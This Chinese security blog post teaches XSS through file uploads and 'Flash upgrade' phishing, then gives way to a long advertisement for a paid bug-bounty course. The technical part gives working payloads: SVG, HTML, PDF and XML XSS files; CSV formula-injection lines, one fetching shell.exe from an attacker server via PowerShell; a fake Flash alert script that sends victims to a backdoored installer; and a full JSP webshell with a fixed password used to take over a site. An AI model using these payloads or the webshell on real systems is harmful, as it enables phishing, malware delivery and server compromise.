文章总结: 文章系统性阐述多种文件上传与XSS组合利用技巧,重点展示Flash弹窗钓鱼实战流程。通过html、svg、pdf、xml文件上传触发XSS,结合伪造Flash升级弹窗分发后门。最后呈现真实getshell案例,并提供完整环境搭建与代码示例。兼顾原理讲解与实操指导,适合渗透测试人员参考。但文章后半部分为培训课程推广,影响技术内容纯粹性。
综合评分: 75
文章分类: 渗透测试,WEB安全,漏洞POC,实战经验,漏洞分析
XSS之Flash弹窗钓鱼
原创
神农Sec
神农Sec
神农Sec
2026年3月20日 10:09
安徽
课程培训
扫码咨询
#
专注于SRC漏洞挖掘、红蓝对抗、渗透测试、代码审计JS逆向,CNVD和EDUSRC漏洞挖掘,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。加内部圈子,文末有彩蛋(课程培训限时优惠)。
#
01
0x1 XSS之Flash弹窗钓鱼
0x1 前言
哈喽,师傅们好!
这次打算给师弟们分享的是XSS之Flash弹窗钓鱼和文件上传getshell各种姿势的内容,然后先是给小白师傅们简单介绍下XSS漏洞和文件上传漏洞。然后后面给师傅们简单演示了XSS之Flash弹窗钓鱼,然后后面很详细的介绍了文件上传和XSS漏洞的组合拳的好几种方式,后面也是通过对一个站点的测试,给师傅们演示了一波。后面给师傅们整理了下pdf木马制作的过程以及最后面分享下我一次在测文件上传最后也是getshell了。
0x2 漏洞简介
文件上传原理
这里利用form表单标签和类型为file的Input标签来完成上传,要将表单数据编码格式置为 multipart/form-data 类型,这个编码类型会对文件内容在上传时进行处理,以便服务端处理程序解析文件类型与内容,完成上传操作。
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file" value="请选择文件"><br />
<input type="submit">
</form>
XSS原理
XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通常会在网页中插入恶意的 JavaScript代码。由于服务器对输入数据的过滤和验证不严格,这些恶意的 JavaScript代码会被当作响应的一部分返回给客户端。当浏览器解析来自服务器的响应时,它会执行这些恶意的 JavaScript代码,从而导致攻击者能够执行恶意操作。
0x3 浅谈上传XSS的各种类型姿势
允许上传HTML或SVG
允许上传html或者svg都可以能导致xss,也能导致任意URL跳转,甚至还能导致SSRF(很难利用),因为核心还是js代码可控;其中URL重定向漏洞可以参考之前我在先知写的文章:https://xz.aliyun.com/t/15069
html造成XSS就不多说了,懂得都懂;
主要说说svg文件如何造成xss。
检查思路:
- 创建一个恶意的svg文件,输入如下内容:
<?xml version="1.0" encoding="UTF-8"?>
<svg version="1.1" xmlns="http://www.w3.org/2000/svg" width="100" height="100">
<script type="application/javascript">
alert('XSS Attack!');
</script>
<polygon points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>
- 上传到文件中,并访问
可以看到已经成功弹窗出来了XSS漏洞
**拓展:如果目标存在导出功能,如给svg导出为pdf这种功能,那么可能存在SSRF **
可尝试使用其他协议更直观的查看,如file://
允许上传PDF文件
可能存在PDF XSS和任意URL跳转,但是由于属于浏览器层面的漏洞,所以厂商大概率不认可。
可以直接使用工具生成:https://www.xunjiepdf.com/editor
也可以按照网上的操作,用迅捷PDF编辑器去操作,效果都一样
因为pdf一般是后端的组件,有的开发可能配置成wkhtmltopdf /tmp/html123.htm /uploads/pdf.pdf ,那就可直接利用file协议进行利用
如果网站本身存在预览JS的地方,可以试试通过CVE-2024-4367来实现PDF XSS 获取Cookie、账户接管等。
允许上传CSV文件
如果允许上传CSV文件,且上传的CSV文件的内容未经过处理过滤直接保存,那么可以尝试上传具有恶意命令执行payload的CSV文件,当其他用户下载该CSV文件时,可能会导致命令执行。
CSV文件的Payload如下:
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
检查思路:
- 上传恶意的CSV文件
- 下载恶意的CSV文件
- 观察下载后的CSV文件是否对
等号=等特殊符号做了处理,payloads会否会成功执行,如果能则说明存在问题
0x4 XSS之Flash弹窗钓鱼
基础环境准备
- Flash网站克隆源码:
GitHub - hackxc/xss_flash: Xss之Flash钓鱼
- 生成后门并捆绑flash的安装程序
- VPS服务器,搭建好flash网站,下载地址要修改为构造好的后门文件。
- 有XSS漏洞的网站:
GitHub - r00tSe7en/Flash-Pop: Flash钓鱼弹窗优化版
具体钓鱼流程
- 找到可以插入一段JS代码的网站,如:存在存储xss漏洞。插入触发flash版本过低弹窗的JS代码:
<script src='本地用来弹flash版本过低的地址'></script>
- 目标点击确定后,跳转到伪造flash界面的VPS服务器
- 目标靶机点击下载并安装,触发后门反弹shell
修改version.js中弹窗的指向伪造Flash网站地址
window.alert = function(name){
var iframe = document. createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src",'data:text/plain,');
document. documentElement.appendChild(iframe);
window.frames [0].window.alert(name);
iframe.parentNode.removeChild(iframe);
}
alert( "您的FLASH版本过低,尝试升级后访问该页面! ");
window. location.href="此处是伪造Flash网站地址";
模拟存在XSS网站的VPS服务器:index.html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Flash Test...</title>
<script src='此处存在XSS网站的VPS服务器地址'></script>
</head>
<body>
<h1>Flash Test...</h1>
</body>
</html>
执行Flash钓鱼成功后,就会跳转到这个官方页面,然后需要你下载这个Flash软件,然后下载执行的exe,那么利用比如CS监听就可以上线成功了
0x5 组合拳实战测试
html、svg文件上传打XSS漏洞
师傅们可以看到找到下面的这个站点的这个功能存在文件上传,我先尝试一手html文件,html文件上传相对来讲常见点,并且一般要是能够上传html文件成功,基本上都可以打一个存储型XSS漏洞了
html恶意弹窗代码如下:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
<script>alert('xss')</script>
</head>
<body>
</body>
</html>
上传成功,可以看到我这里上传的html文件的url路径,下面尝试访问下这个路径,看看里面的html恶意弹窗代码会不会执行
可以看到我这里换个浏览器访问,也是成功执行XSS弹窗了的
上传svg恶意文件也是一样的
svg恶意弹窗代码如下:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert(xss);
</script>
</svg>
也是一样换个浏览器访问,照样是可以成功执行弹窗的
制作pdf弹窗木马
pdf编辑器下载地址如下:
https://www.xunjiepdf.com/
直接打开然后新建空白页面,然后点击属性,然后点击右边的小点点
然后出现下面的选项框,点击新增js代码
写入app.alert(xss); js代码,然后保存到本地
然后也是按照上面的一样步骤,也是可以打出一个存储型XSS漏洞
上传XML文件打XSS漏洞
上传xml文件必须CORS允许所有域 CORS 跨域资源请求(允许我们网站加载其他网页代码)
- xml它需要上传2个文件
- 首先上传第一个xml文件(url地址我们首先拿到)
- 然后再上传第二个xml文件
xml1:https://xxx.com/File/1/xxxxxx.xml
<?xml version="1.0" encoding="iso-8859-1"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://xxxx.org/1999/XSL/Transform">
<xsl:template match="/">
<html><body>
<script>alert(/1/);</script>
</body></html>
</xsl:template>
</xsl:stylesheet>
然后上传xml2,代码中的href填写xml1的上传链接路径
<?xml version="1.0" encoding="iso-8859-1"?>
<?xml-stylesheet type="text/xsl" href=""?>
<test></test>
CURL查看:curl 域名 -H “Origin: https://baidu.com” -I
文件上传——getshell
下面这个站点就是通过测试文件上传打XSS漏洞,然后进行的getshell。 经审计,发现该小程序网站是Java框架搞的,那么我们就可以尝试上传jsp后缀的webshell编写的木马来尝试下getshell了。
1、尝试上传jsp代码,发现该代码直接被执行了。真的是逆天了,师傅们!一点过滤都没有,直接解析了,那么就说明他这个网站可以执行jsp代码,那我这不就可以上传jsp木马了嘛。
------WebKitFormBoundaryybBAbhwqIL86Jdcn
Content-Disposition: form-data; name="file"; filename="test.html"
Content-Type: text/html
alert(1)
------WebKitFormBoundaryybBAbhwqIL86Jdcn--
2、上传jsp木马,使用蚁剑连接,getshell
jsp木马如下,蚁剑连接密码:passwd
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
returnsuper.defineClass(b, 0, b.length);
}
}
publicbyte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
成功上传jsp木马,然后使用蚁剑成功连接,然后getshell了。
0x6 总结
这篇文章对于仪式内容的介绍和分享就到这里了,然后后面要是有什么问题和需要交流的地方,师傅们可以跟我讨论下,里面的一些案例包括各种的打都写的蛮详细的,对小白师傅比较友好哈! 最后,希望这篇文章对师傅们有帮助哈!!!
02
0x2 培训课程介绍
26
SRC漏洞挖掘培训课程
1.课程价格目前是400(后面也会随着人数越多,涨价)🌟师傅们还可以上车补票,冲冲冲!
2.报名成功送知识星球一个,拉内部小圈子交流群+SRC直播通知群!✨
3.一周2节课程,直播+录播形式,课程内容大家可以看课表,目前是第一期,一次报名永久无限听课!❤️
4.目前是第一期课程,后面比如说开了二、三期,都是不用在花钱的!
5.上课结束后,会把视频录播+课件笔记一起打包发直播群!
6.哔哩哔哩SRC课程公开课,链接🔗直达:
https://space.bilibili.com/642258933
SRC课程详情🔎:神农SRC 漏洞挖掘实战课:从 0 到 1 成为赏金猎人
内部小圈子知识星球详情🔎:强烈推荐一个永久的SRC挖掘、渗透攻防内部知识库
欢迎关注微信公众号:神农Sec,报名咨询添加微信:routing_love
开课一个月时间左右,课程目前已经累计加入了478个学员了,课程培训招生任火热持续中,师傅们对于我们课程感兴趣的,想要学习技术,找工作的可以咨询我报名。
课程培训记录📝,每次上车在1-3小时之间,上课包括课程内部群大家交流氛围很好!
课程上课笔记课件📒都会打包给师傅们,笔记都非常详细,很多几k价格的培训机构哪怕是课件笔记都没有的,我这里都是下课第一时间把录播+笔记打包发给大家!
平常也都会给学员进行一些项目发布,包括后面的工作、护网内推等,经常上麦交流,大家互相学习,简历优化等。
SRC漏洞挖掘课程培训已经两个星期了,期间也是创建了“回本小群”,希望学员回本越来越多,创建这个群主要是鼓励学员学习进步,以及不定时发小项目!
最后也是希望大家都可以赚钱,找到好工作🎉
培训时间不长,感谢🙏师傅们的喜报,很开心看到师傅们给我分享自己的成果,希望师傅们越来越强!
平常也会分享项目,下面是一些学员项目成果,群里报课的学员都是不抽成的,主要是帮助学员进行回本,让大家都可以进步!
上课结束后,会把视频录播+课件笔记一起打包发直播群
「神农安全」知识星球目前已经累计1800+网络安全爱好者的加入!
后面也是小圈子做大起来了,师傅们也都喜欢看我文章,想着给大家教下src漏洞挖掘思路,所以自己花了很长时间做了✨课件和课表,都是纯自己手搓的,大家也可以看下课表的内容。
03
0x3 课程特色
课程主打真实,一线SRC漏洞挖掘师傅是如何学习和挖掘SRC漏洞的,让你真正了解SRC漏洞挖掘,助力在岗人员和大学生的能力提升,掌握新的技能树,为下一次跳槽涨薪做好准备。本课程内容覆盖企业SRC、众测项目挖掘、护网HVV红蓝攻防技巧、CVE、CNVD、EDUSRC等平台通杀案例技巧挖掘方法。
本课程适合人群(光看不挖啥也不会)
1、想从0转行入行的大学生或自学者2、想从CTF比赛/Web或SRC进阶到项目实战的选手3、想参与项目/找工作/提高收入的转型者
课程价格:400元
报课成功的师傅们直接免费送内部小圈:一个知识星球+内部小圈子交流群
1、课程价格真心实惠,绝不割韭菜2、两三百的课程价格让你体会大几千的培训课程内容3、带着大家从0到1,本人上课坚持手搓课件(实战案例+知识体系)4、拒绝使用PPT演讲模式(无实操,很枯燥)
直播培训教学方式
课程一周1-2节课,课程特色涵盖直播多人上麦活跃回答,直播过程中有问题随时解决或私信我。拉微信群:一个知识星球内部小圈子交流群+课程培训直播通知群。有项目/工作/护网第一时间内推报课的师傅,一对一简历优化,助力在岗人员和大学生的能力提升。
一次报名每期均可永久学习,并且赠送内部「神农安全」知识星球,一对一永久解答、无保留教学!
欢迎关注微信公众号:神农Sec,报名咨询添加微信:routing_love
课程均为线上交付,报名成功后不支持退款
内部小圈子(知识星球+内部小圈子交流群+知识库)
对内部小圈子感兴趣的师傅们也可以看下下面的这个跳转链接,里面有对小圈子的详细介绍,报名课程成功的师傅们直接免费送一个(直接点击下面直接可以跳转)。
讲师介绍
id:一个想当文人的黑客
欢迎关注微信公众号:神农Sec,报名咨询添加微信:routing_love
04
0x4 第一期挖洞培训课表内容
内部圈子介绍(报课赠送)
圈子专注于更新src/红蓝攻防相关:
1、维护更新src专项漏洞知识库,包含原理、挖掘技巧、实战案例2、知识星球专属微信“小圈子交流群”3、微信小群一起挖洞4、内部团队专属EDUSRC证书站漏洞报告5、分享src优质视频课程(企业src/EDUSRC/红蓝队攻防)6、分享src挖掘技巧tips7、不定期有众测、渗透测试项目(一起挣钱)8、不定期有工作招聘内推(工作/护网内推)9、送全国职业技能大赛环境+WP解析(比赛拿奖)10、十个专栏会持续更新~提前续费有优惠,好用不贵很实惠11、每日内部资料分享,内部圈子资料1000+12、联系圈主获取:内部漏洞知识库+圈子使用手册+内部圈子交流群13、VX:routing_love,技术交流+疑问解决
内部圈子专栏介绍
知识星球内部共享资料截屏详情如下
(只要没有特殊情况,每天都保持更新)
05
0x5 优秀学员报喜
下面是最近一个月培训期间,很多优秀学员进行报喜,看到师傅们有收获,也是感到很开心的!拉回本小群,就是为了促进大家学习,在群里发学员成果,也是为了让大家学习优秀的师傅们。
加油,你我皆是黑马!
神农安全公开交流群
有需要的师傅们直接扫描文章二维码加入,然后要是后面群聊二维码扫描加入不了的师傅们,直接扫描文章开头的二维码加我(备注加群)
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
往期回顾
手把手js逆向断点调试&js逆向前端加密对抗&企业SRC实战分享
JS漏洞挖掘|分享使用FindSomething联动的挖掘思路
渗透测试 | 从jeecg接口泄露到任意管理员用户接管+SQL注入漏洞
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:神农Sec 神农Sec
神农Sec《XSS之Flash弹窗钓鱼》